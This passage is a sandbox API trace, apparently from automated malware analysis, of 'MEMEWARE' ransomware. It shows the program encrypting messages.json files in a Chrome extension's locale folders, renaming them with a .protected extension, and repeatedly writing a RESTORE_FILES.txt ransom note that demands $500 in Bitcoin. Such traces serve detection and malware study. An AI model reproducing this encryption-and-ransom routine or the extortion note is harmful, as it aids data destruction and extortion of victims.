hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.881] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\RESTORE_FILES.txt") returned 161 [0079.881] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.882] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.882] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.883] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.883] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.883] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.883] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.883] CloseHandle (hObject=0x164) returned 1 [0079.883] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.883] lstrcmpiW (lpString1="sv", lpString2="Windows") returned -1 [0079.883] lstrcmpiW (lpString1="sv", lpString2="Program Files") returned 1 [0079.883] lstrcmpiW (lpString1="sv", lpString2="Program Files (x86)") returned 1 [0079.883] lstrcmpiW (lpString1="sv", lpString2="$Recycle.bin") returned 1 [0079.884] lstrcmpiW (lpString1="sv", lpString2="System Volume Information") returned -1 [0079.884] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv") returned 143 [0079.884] lstrcmpW (lpString1="sv", lpString2=".") returned 1 [0079.884] lstrcmpW (lpString1="sv", lpString2="..") returned 1 [0079.884] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\*") returned 145 [0079.884] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.884] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.884] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.884] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.884] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.884] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.884] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\.") returned 145 [0079.884] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.884] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.884] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.884] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.884] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.884] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.884] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.884] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\..") returned 146 [0079.884] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.884] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.884] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.885] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.885] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.885] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.885] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.885] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.885] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json") returned 157 [0079.885] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.885] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.885] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.885] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.885] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.885] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json") returned 157 [0079.885] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.885] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json") returned 157 [0079.885] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.885] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json") returned 157 [0079.885] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.885] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.887] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.887] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.887] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.887] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.887] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.887] CloseHandle (hObject=0x168) returned 1 [0079.887] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json.protected") returned 167 [0079.887] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json.protected")) returned 1 [0079.888] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.888] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.888] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\RESTORE_FILES.txt") returned 161 [0079.888] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.888] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.888] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.889] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.889] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.890] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.890] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.890] CloseHandle (hObject=0x164) returned 1 [0079.890] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.890] lstrcmpiW (lpString1="th", lpString2="Windows") returned -1 [0079.890] lstrcmpiW (lpString1="th", lpString2="Program Files") returned 1 [0079.890] lstrcmpiW (lpString1="th", lpString2="Program Files (x86)") returned 1 [0079.890] lstrcmpiW (lpString1="th", lpString2="$Recycle.bin") returned 1 [0079.890] lstrcmpiW (lpString1="th", lpString2="System Volume Information") returned 1 [0079.890] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th") returned 143 [0079.890] lstrcmpW (lpString1="th", lpString2=".") returned 1 [0079.890] lstrcmpW (lpString1="th", lpString2="..") returned 1 [0079.890] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\*") returned 145 [0079.890] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.891] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.891] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.891] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.891] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.891] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.891] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\.") returned 145 [0079.891] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.891] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.891] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.891] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.891] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.891] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.891] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.891] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\..") returned 146 [0079.891] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.891] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.891] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.891] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.891] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.892] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.892] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.892] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.892] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json") returned 157 [0079.892] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.892] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.892] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.892] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.892] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.892] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json") returned 157 [0079.892] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.892] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json") returned 157 [0079.892] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.892] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json") returned 157 [0079.892] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.892] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.893] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.893] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.893] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.894] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.894] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.894] CloseHandle (hObject=0x168) returned 1 [0079.894] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json.protected") returned 167 [0079.894] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json.protected")) returned 1 [0079.895] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.895] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.895] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 